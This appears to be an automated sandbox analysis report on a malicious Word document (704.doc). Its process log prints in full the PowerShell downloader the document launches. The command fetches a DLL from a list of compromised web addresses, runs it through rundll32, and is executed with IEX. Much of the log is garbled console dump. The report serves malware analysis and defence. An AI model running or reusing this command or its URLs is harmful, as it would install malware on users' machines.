Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................:T.k......T...............7.............}..v....H.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0.b.............H.T.....4.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................ZU.k....h.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................:T.k......T...............7.............}..v....(.......0.b.....................l.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................ZU.k......................7.............}..v....`.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w............ .......:T.k......................7.............}..v....."......0.b.............H.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................ZU.k.....#................7.............}..v....($......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................:T.k......T...............7.............}..v....p.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................ZU.k....(.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................:T.k......T...............7.............}..v....p.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................ZU.k....(.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.....................~.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................ZU.k......................7.............}..v....H.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v....X.......0.b.............H.T.....$.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............:T.k......T...............7.............}..v....X.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............:T.k......T...............7.............}..v....X.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............:T.k......T...............7.............}..v....X.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............:T.k......T...............7.............}..v....X.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............:T.k......T...............7.............}..v....X.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............:T.k......T...............7.............}..v....X.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............:T.k......T...............7.............}..v....X.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............:T.k......T...............7.............}..v....X.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....8.......0.b.............H.T.....4.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....p ......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....%......0.b.....................l.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....h&................7.............}..v.....&......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......:T.k......T...............7.............}..v....x*......0.b.............H.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....0+................7.............}..v.....+......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....%......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....h&................7.............}..v.....&......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....-......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....h.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....P4......0.b.....................~.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....5................7.............}..v.....5......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v.....9......0.b.............H.T.....$.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....P:................7.............}..v.....:......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....A......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....PB................7.............}..v.....B......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....I......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....PJ................7.............}..v.....J......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....Q......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....PR................7.............}..v.....R......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....Y......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....PZ................7.............}..v.....Z......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............:T.k......T...............7.............}..v.....a......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............ZU.k....Pb................7.............}..v.....b......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7...............:T.k......T...............7.............}..v.....i......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7...............ZU.k....Pj................7.............}..v.....j......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C...............:T.k......T...............7.............}..v.....q......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C...............ZU.k....Pr................7.............}..v.....r......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............:T.k......T...............7.............}..v.....y......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............ZU.k....Pz................7.............}..v.....z......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[.......e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[...............ZU.k......................7.............}..v....H.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............ZU.k......................7.............}..v....H.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....x.......0.b.............H.T.....4.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............ZU.k....0.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.....................l.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......:T.k......T...............7.............}..v............0.b.............H.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....p.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v.... .......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v.... .......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.....................~.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0.b..............................A}..... .........7.............}..v............ .................T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............:T.k......T...............7.............}..v....H.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0.b.............H.T.....4.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............ZU.k....h.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............:T.k......T...............7.............}..v....(.......0.b.....................l.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............ZU.k......................7.............}..v....`.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._....... .......:T.k......T...............7.............}..v............0.b.............H.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............ZU.k......................7.............}..v....(.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............ZU.k....`.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....`.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....H.......0.b.....................~.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....%......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H&................7.............}..v.....&......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....-......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....5......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H6................7.............}..v.....6......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....=......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H>................7.............}..v.....>......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....E......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....HF................7.............}..v.....F......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....M......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....HN................7.............}..v.....N......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....S................7.............}..v....@T......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....[......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....[................7.............}..v....@\......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....p`......0.b.............H.T.....4.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....(a................7.............}..v.....a......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............:T.k......T...............7.............}..v.....f......0.b.....................l.......(...............
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$704.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRE407.tmp
Source: classification engine | Classification label: mal92.expl.evad.winDOC@5/13@0/0
Source: 704.doc | OLE document summary: title field not present or empty
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr | OLE document summary: title field not present or empty
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr | OLE document summary: author field not present or empty
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr | OLE document summary: edited time not present or 0
Source: ~DF59F33552EDE7EF7C.TMP.0.dr | OLE document summary: title field not present or empty
Source: ~DF59F33552EDE7EF7C.TMP.0.dr | OLE document summary: author field not present or empty
Source: ~DF59F33552EDE7EF7C.TMP.0.dr | OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
Source: ~DF59F33552EDE7EF7C.TMP.0.drStream path 'VBA/cvbku3gakuisdgfilu3gblaw' : High number of string operations
Obfuscated command line foundShow sources
